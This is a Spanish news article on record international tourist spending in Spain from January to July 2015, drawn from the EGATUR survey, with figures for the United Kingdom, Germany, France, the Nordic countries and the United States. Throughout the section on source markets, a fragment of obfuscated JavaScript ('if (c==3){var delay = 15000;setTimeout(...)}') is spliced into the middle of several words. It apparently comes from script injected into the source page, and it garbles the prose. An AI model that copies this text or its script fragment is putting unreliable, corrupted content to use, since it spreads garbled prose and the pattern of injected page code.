El gasto de los turistas internacionales alcanza su mejor cifra histórica en un mes de julio con 8.841 millones de euros, un 8,8% más

El gasto total realizado por los turistas internacionales entre enero y julio de 2015 ascendió a 37.129 millones de euros, un 7,7% más que en el mismo periodo del año anterior, lo que supone la mejor cifra de la serie histórica de la Encuesta de Gasto Turístico (EGATUR), realizada por la Subdirección General de Conocimiento y Estudios Turísticos, del Ministerio de Industria, Energía y Turismo.

En este periodo, los gastos medios por persona y por día acumulan aumentos del 2,9% y del 3,8% respectivamente.

En términos absolutos destaca la aportación de Reino Unido, seguida de los países asiáticos, Francia y EEUU. Las principales comunidades registraron un crecimiento del gasto; es Baleares la que acumula un mayor aumento en términos absolutos (561 millones adicionales) y la Comunidad de Madrid la que registró la tasa de crecimiento más alta (+13,1%).

En el mes de julio, también se superó la mejor cifra histórica para ese mes tras alcanzar el gasto de los turistas internacionales los 8.841 millones de euros, con una variación del 8,8%. Este incremento del gasto turístico estuvo motivado tanto por el aumento del flujo de turistas (+6,3%), como por el crecimiento del gasto medio por persona (+2,4%) que se situó en 1.007 euros, y el aumento del gasto medio diario (+2,7%) hasta los 106 euros.

Mercados Emisores

Los turistas procedentes de Reino Unido efectuaron una vez más el gasto turístico más importante tanto en los siete primeros meses como en el mes de julio, ostentandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando de nuevo la condición de principal emisor. Entre enero y julio, los turistas británicos gastaron en España 7.580 millones de euros, con un incremento del 11,2% y un porcentaje sobre el total del gasto recibido en España del 20,4%. En julio enlazaron siete meses de crecimiento ininterrumpido, con 1.853 millones de gasto efectuado, lo que supone un aumento del 16% y un peso del 21% sobre el total. Esta subida estuvo motivada por el incremento del gasto medio por turista (9%) y diario (9,2%).

Alemania gastó 5.514 millones de enero a julio, con subida del 1%, llegandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando al 14,9% del total de gasto turístico. En el mes, con 1.098 millones gastados, un 2,9% más, llegó al 12,4% del total. El gasto medio por turista alemán se estableció en 943 euros (+2,7%). Baleares fue la comunidad más beneficiada de este crecimiento.

Francia desembolsó en España 3.604 millones de gasto turístico en los primeros siete meses del año, un 10,6% más que el año anterior, lo que supuso el 9,7% del total. En julio, Francia, también estuvo en la tercera posición por volumen de gasto, registrandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando 913 millones y un aumento del 4,5%, lo que correspondió al 10,3% del total, gracias al aumento de llegadas. Este aumento repercutió notablemente en Andalucía y Baleares, mientras se redujo en Cataluña.

La minoración en las llegadas de turistas procedentes de los países nórdicos provocó a su vez una disminución del gasto del -3,4%, con un gasto de 819 millones de euros en julio, y ello pese al  aumento de su gasto medio tanto por turista como diario. Canarias y Baleares fueron las perjudicadas por este descenso. También en el periodo cae el gasto de este mercado, en este caso un -5,2%, tras el desembolso de 3.458 millones de euros alcanzandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el 9,3% del total.

EEUU se posiciona como quinto mercado generador de gasto. Sus turistas se dejaron en sus viajes a España 2.088 millones hasta julio, un 16,3% más, representandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el 5,6% del total. En el mes, disminuye el gasto de este emisor un -7,6% debido a la contracción de sus gastos medios ya que el flujo de turistas y la estancia media aumentaron notablemente.

El conjunto del resto de mercados generó el 41,5% del gasto, mostrandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando un crecimiento del 14,3%, en el que destacaron las subidas de los países asiáticos, Bélgica, Canadá e Italia.